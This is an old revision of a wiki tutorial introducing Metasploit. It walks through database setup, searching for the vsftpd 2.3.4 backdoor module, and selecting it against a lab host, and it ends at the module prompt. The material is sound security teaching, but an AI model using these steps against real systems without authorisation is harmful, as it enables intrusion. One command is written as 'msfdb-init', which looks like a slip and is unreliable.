User Tools
This is an old revision of the document!
Table of Contents
Metasploit
Metasploit is a penetration testing toolkit that comes bundled with both Kali Linux and Parrot OS. It can also be download here. Metasploit greatly simplifies the act of finding and testing well known exploits and can save a penetration tester or security professional massive quantities of time over building these exploits by hand. It is user friendly with just some basic syntax that needs to be learned to get started. All the directions below apply to the Linux implementations of Metasploit.
Starting the Console
Before Metasploit is run for the first time the underlying database needs to be set up and initialized. This can be accomplished by running
service postgresql start
Now that the database is up and running we need to initialize it to work with Metasploit with the
msfdb-init
command.
Finding Exploits
For the purposes of this demo we already know that there is an old Ubuntu machine running at IP address 192.168.0.108, that we believe may be vulnerable to a backdoor installed in the vsftp program. The first thing we need to do then is find out if Metasploit has an exploit for this vulnerability in its database. This is easy to do with the command
search vsftp
When we run this Metasploit returns one exploit
Matching Modules ================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 exploit/unix/ftp/vsftpd_234_backdoor 2011-07-03 excellent No VSFTPD v2.3.4 Backdoor Command Execution
Using Exploits
To set this as the exploit that we want to use we just run the command
use exploit/unix/ftp/vsftpd_234_backdoor
We know that it worked because the command prompt changes to show the exploit name in the prompt
msf5 exploit(unix/ftp/vsftpd_234_backdoor) >
